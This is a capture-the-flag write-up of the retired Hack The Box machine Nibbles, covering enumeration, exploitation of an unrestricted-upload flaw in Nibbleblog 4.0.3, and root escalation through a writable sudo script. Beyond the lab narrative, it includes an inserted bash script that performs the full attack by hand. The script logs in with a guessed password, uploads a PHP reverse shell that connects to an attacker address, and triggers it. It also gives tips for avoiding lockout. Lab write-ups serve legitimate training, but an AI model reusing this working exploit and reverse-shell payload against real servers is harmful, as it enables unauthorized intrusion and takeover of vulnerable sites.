Wednesday, March 13, 2019
Nibbles
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Nibbles, which is a retired machine from the Hack The Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- The Nibbles machine's IP is 10.10.10.75:
- Scanning with Nmap, there are just two open ports, 22 (SSH) and 80 (HTTP):
- Scanning deeper:
- Browsing the web page:
- Viewing the page source, an HTML comment reveals a folder called /nibbleblog:
- Same result with curl:
- Browsing /nibbleblog, it turns out to be a blogging platform (Nibbleblog):
- Dirbusting /nibbleblog:
- Dirbusting for files with the .php extension:
- So we have found directories like /admin, /content, /languages and files like admin.php, feed.php, install.php, sitemap.php, update.php
- Let's examine some of the files and directories found with dirb.
- admin.php provides a login form:
- feed.php:
- install.php:
- update.php shows that the version used is Nibbleblog 4.0.3 "Coffee":
- sitemap.php:
- /content:
- Browsing to /nibbleblog/content/private/users.xml (the "private" folder is served without any authentication) we find the username admin:
- /languages:
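As an added example that is not part of the original write-up, the two source-inspection steps above (finding the hidden path in an HTML comment and pulling the username out of the exposed users.xml) done with a few lines of shell, so they can be repeated against saved copies of the pages. Both input files are constructed samples modelled on what the write-up describes, not captures from the machine, and the users.xml layout (a `username` attribute on each `<user>` element) is an assumption to check against the real file.

```bash
#!/bin/bash
# Added example, not the write-up's own commands. Both input files below are
# constructed samples standing in for the pages described in the text.

# Print the body of every single-line HTML comment read on stdin.
# Hidden paths such as /nibbleblog tend to show up only in these.
html_comments() {
    sed -n 's/.*<!--\(.*\)-->.*/\1/p' | sed 's/^[[:space:]]*//; s/[[:space:]]*$//'
}

# Print every username from a Nibbleblog content/private/users.xml read on stdin.
# Assumption: each account is stored as <user username="..."> (check the real file).
xml_usernames() {
    grep -o 'username="[^"]*"' | sed 's/^username="//; s/"$//'
}

# Same thing against a live target. The "private" directory is served by
# Apache without any login, which is the information leak used here.
# Needs network access to the target, so it is not called in the sample run.
remote_usernames() {
    curl -s "http://$1/nibbleblog/content/private/users.xml" | xml_usernames
}

# Constructed samples (not captures from the machine)
workdir=$(mktemp -d)
cat > "$workdir/index.html" <<'EOF'
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
EOF
cat > "$workdir/users.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>
EOF

echo "Paths hidden in comments:"; html_comments < "$workdir/index.html"
echo "Usernames:";                xml_usernames < "$workdir/users.xml"
```

Note that Nibbleblog keeps its login-failure counters and IP blacklist in this same file (modelled in the sample as `session_fail_count` and `<blacklist>`): spraying a wordlist at admin.php trips that lockout, which is why trying a couple of obvious candidates such as the machine name is the quieter move.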
3 - EXPLOITATION
- CVE-2015-6967 describes an unrestricted file upload in the My Image plugin of Nibbleblog versions before 4.0.5: an authenticated administrator can upload a file with an executable extension and have the server run it (as seen above, Nibbles runs version 4.0.3):
- Metasploit provides a module to exploit this vulnerability:
- Using this module we get a Meterpreter session, passing the username admin (discovered in users.xml) and the password nibbles (guessed; it is simply the machine name):
- Getting a shell:
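As an added example that is not part of the original write-up or of the Metasploit module, the same attack done by hand with curl, which is worth knowing for engagements where Metasploit is not an option. The three requests (log in, upload through the My Image plugin, request the stored file) follow how the module drives Nibbleblog's admin.php; the form field names and the stored filename image.php are assumptions to verify against the live forms, and the attacker address 10.10.14.2 is a placeholder.

```bash
#!/bin/bash
# Added example: CVE-2015-6967 by hand with curl (not the write-up's commands).
# Form field names and URLs follow the Metasploit module's behaviour and are
# assumptions to check against the live admin pages.

TARGET=${TARGET:-10.10.10.75}   # Nibbles, from the write-up
LHOST=${LHOST:-10.10.14.2}      # placeholder attacker address (assumption)
LPORT=${LPORT:-1234}

# Nibbleblog URLs involved in the attack
login_url()  { printf 'http://%s/nibbleblog/admin.php' "$1"; }
upload_url() { printf 'http://%s/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image' "$1"; }
# The plugin stores the upload as image.<original extension>, so a .php upload
# lands as image.php and Apache executes it on request.
shell_url()  { printf 'http://%s/nibbleblog/content/private/plugins/my_image/image.php' "$1"; }

# Minimal PHP reverse shell used as the upload (constructed payload): in a
# fresh php process fsockopen returns fd 3, which the spawned shell inherits.
php_reverse_shell() {
    printf '<?php $sock=fsockopen("%s",%s); exec("/bin/sh -i <&3 >&3 2>&3"); ?>\n' "$1" "$2"
}

exploit() {
    jar=$(mktemp); payload=$(mktemp)
    php_reverse_shell "$LHOST" "$LPORT" > "$payload"
    # 1. log in as admin (credentials from the write-up) and keep the session cookie
    curl -s -c "$jar" -b "$jar" \
        -d 'username=admin&password=nibbles' "$(login_url "$TARGET")" > /dev/null
    # 2. upload the PHP file through the My Image plugin's config form; the plugin
    #    never checks the extension, which is the bug behind CVE-2015-6967
    curl -s -b "$jar" \
        -F 'plugin=my_image' -F 'title=My image' -F 'position=4' -F 'caption=' \
        -F "image=@$payload;filename=shell.php;type=application/x-php" \
        "$(upload_url "$TARGET")" > /dev/null
    # 3. request the stored file; it connects back to `nc -lvnp $LPORT` on LHOST
    curl -s "$(shell_url "$TARGET")"
    rm -f "$jar" "$payload"
}

# Only touch the target when explicitly asked (hypothetical usage: ./exploit.sh run)
if [ "${1:-}" = run ]; then exploit; fi
```

Before step 3, confirm the upload worked by listing /nibbleblog/content/private/plugins/my_image/ in the browser; if image.php is missing, the most likely cause is a field name that differs from the assumptions above, so compare with the real plugin form in the admin panel.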
4 - CAPTURING THE 1st FLAG
- Reading user.txt:
5 - PRIVILEGE ESCALATION
- As expected, access to /root is denied:
- User nibbler can run the file monitor.sh with sudo as root, and no password is required:
- There is a file personal.zip in nibbler's home folder:
- Unzipping personal.zip, we find monitor.sh (the script that sudo allows) inside the directory personal/stuff:
- Reading monitor.sh, it is a system-monitoring script that reports on various aspects of the Nibbles host:
- Since the script lives under nibbler's home folder (so nibbler controls its contents) and runs as root under sudo, the privilege escalation plan is to overwrite monitor.sh with a backdoor, for instance this reverse shell one-liner created with Msfvenom:
- Echoing the backdoor into monitor.sh, overwriting its contents:
- Starting a Netcat listener on Kali's port 1234:
- Running monitor.sh on Nibbles with sudo:
- The result is a reverse shell as root on Kali:
6 - CAPTURING THE 2nd FLAG
- Reading root.txt: